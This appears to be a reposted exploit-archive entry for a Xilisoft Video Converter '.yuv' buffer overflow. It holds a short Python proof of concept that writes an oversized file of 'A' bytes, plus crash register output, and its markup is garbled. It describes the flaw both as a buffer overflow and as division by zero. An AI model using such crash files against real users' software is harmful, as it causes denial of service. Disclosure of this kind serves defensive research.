
Xilisoft Video Converter Wizard – ‘.yuv’ Stack Buffer Overflow
۱ ۲ ۳ ۴ ۵ ۶ ۷ ۸ ۹ ۱۰ ۱۱ ۱۲ ۱۳ ۱۴ ۱۵ ۱۶ ۱۷ ۱۸ ۱۹ ۲۰ ۲۱ ۲۲ ۲۳ ۲۴ ۲۵ ۲۶ ۲۷ ۲۸ ۲۹ ۳۰ ۳۱ ۳۲ ۳۳ ۳۴ ۳۵ |
source<span class="token punctuation">:</span> http<span class="token punctuation">:</span><span class="token operator">//</span>www<span class="token punctuation">.</span>securityfocus<span class="token punctuation">.</span>com<span class="token operator">/</span>bid<span class="token operator">/</span><span class="token number">38854</span><span class="token operator">/</span>info Xilisoft Video Converter <span class="token keyword">is</span> prone to a stack<span class="token operator">-</span>based <span class="token builtin">buffer</span><span class="token operator">-</span>overflow vulnerability because the application fails to perform adequate boundary checks on user<span class="token operator">-</span>supplied <span class="token builtin">input</span><span class="token punctuation">.</span> Attackers may leverage this issue to execute arbitrary code <span class="token keyword">in</span> the context of the application<span class="token punctuation">.</span> Failed attacks will cause denial<span class="token operator">-</span>of<span class="token operator">-</span>service conditions<span class="token punctuation">.</span> <span class="token comment">#! /usr/bin/python</span> <span class="token comment">#</span> <span class="token comment"># Xilisoft Video Converter(.yuv file) Stack buffer Overflow Poc</span> <span class="token comment"># Homepage: www.xilisoft.com</span> <span class="token comment"># #############################################################################</span> <span class="token comment"># Credit : ItSecTeam</span> <span class="token comment"># mail : Bug@ItSecTeam.com</span> <span class="token comment"># Web: WwW.ITSecTeam.com</span> <span class="token comment"># Forum: WwW.forum.itsecteam.com</span> <span class="token comment"># Exploit Coded by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam</span> <span class="token comment"># Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder</span> <span class="token comment"># #############################################################################</span> <span class="token comment"># Bug: Integer Division By Zero</span> <span class="token comment"># Tested in : Windows XP SP3 EN</span> <span class="token comment"># Tested version : 3 = Crash</span> <span class="token comment"># Usage: ./Xilisoft-poc.py</span> <span class="token comment"># #############################################################################</span> <span class="token comment"># ۱۰۲DFDAB: Integer divide by zero (exc.code c0000094, tid 2908)</span> <span class="token comment"># EAX 00000000 ECX 00000000 EBX 00000001 ESP 000E629C EBP 025B3270</span> <span class="token comment"># ESI 00000000 EDI 00000000 EIP 102DFDAB avcodec.102DFDAB</span> <span class="token keyword">try</span><span class="token punctuation">:</span> <span class="token builtin">file</span><span class="token operator">=</span><span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"Xilisoft-poc.yuv"</span><span class="token punctuation">,</span><span class="token string">'w'</span><span class="token punctuation">)</span> Buff <span class="token operator">=</span> <span class="token string">"\x41"</span> <span class="token operator">*</span><span class="token number">۵۰۰۰۰۰</span> <span class="token builtin">file</span><span class="token punctuation">.</span>write<span class="token punctuation">(</span> Buff <span class="token punctuation">)</span> <span class="token builtin">file</span><span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token string">"[+] File created successfully: Xilisoft-poc.yuv"</span> <span class="token punctuation">)</span> <span class="token keyword">except</span><span class="token punctuation">:</span> <span class="token keyword">print</span> <span class="token string">"[-] Error cant write file to system\n"</span> |
اطلاعات پروژه
- دسته: آسیب پذیری های امنیتی
- Status :
- مشتری :
- تاریخ: ۱۱/۱۰/۱۳۹۷
- برچسب ها : آسیب پذیری های امنیتی